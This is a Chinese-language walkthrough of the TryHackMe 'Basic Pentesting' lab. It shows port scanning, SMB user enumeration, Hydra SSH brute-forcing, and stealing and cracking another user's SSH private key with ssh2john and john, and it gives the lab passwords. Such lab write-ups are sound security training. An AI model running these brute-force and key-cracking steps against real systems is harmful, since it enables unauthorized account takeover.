【THM】Basic Pentesting-Practice

本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/basicpentestingjt

端口扫描

1
nmap -p- -sC -sV -T4 10.10.186.104

image-20231113154701964

image-20231113154716843

1
gobuster dir --url http://10.10.186.104  -w /usr/share/wordlists/dirb/common.txt 

image-20231113155503404

image-20231113160734684

image-20231113160726319

获取目标机用户名

we use enum4linux to enumerate users

enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息

1
enum4linux -a 10.10.186.104
1
2
3
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

方法二:

1
2
3
4
#由之前的nmap扫描结果可知:目标机运行了Samba服务
#我们尝试使用匿名登录Samba
smbclient //10.10.144.213/anonymous
#发现员工信息,成功获取目标机用户名

爆破

1
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.186.104

image-20231113164107322

密码为armando

1
ssh jan@10.10.186.104

image-20231113172028644

image-20231113172355668

发现其他用户的hash密钥–id_rsa

将该密钥内容复制到攻击机上的id_rsa 中,先对id_rsa 进行加权操作,再尝试使用id_rsa通过ssh登录另一目标机用户,发现需要密码口令,在攻击机上使用john对id_rsa进行hash破解:

1
chmod 600 id_rsa
1
2
3
4
5
#提取密钥hash值
ssh2john id_rsa > id_rsa_hash.txt

#破解hash值
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash.txt

image-20231113173022342

beeswax

使用密码口令和idrsa.id_rsa 通过ssh登陆目标机的另一用户账号,并查看敏感文件信息

1
ssh -i id_rsa kay@10.10.186.104

image-20231113173956734

image-20231113173943002

Q&A

1

在利用SSH登录某目标时,出现下述报错:

1
ssh loneferret@192.168.140.146
1
Unable to negotiate with 192.168.140.146 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

解决方案

之所以报错是因为OpenSSH 7.0以后的版本不再支持ssh-dss (DSA)算法,解决方法是增加选项-oHostKeyAlgorithms=+ssh-dss,即可成功解决

2

一开始我给id_rsa文件777的权限

然后提示这个

image-20231113191835811

主要是给的这个密钥权限太大了,所以它不怎么安全

解决方案

1
chmod 600 id_rsa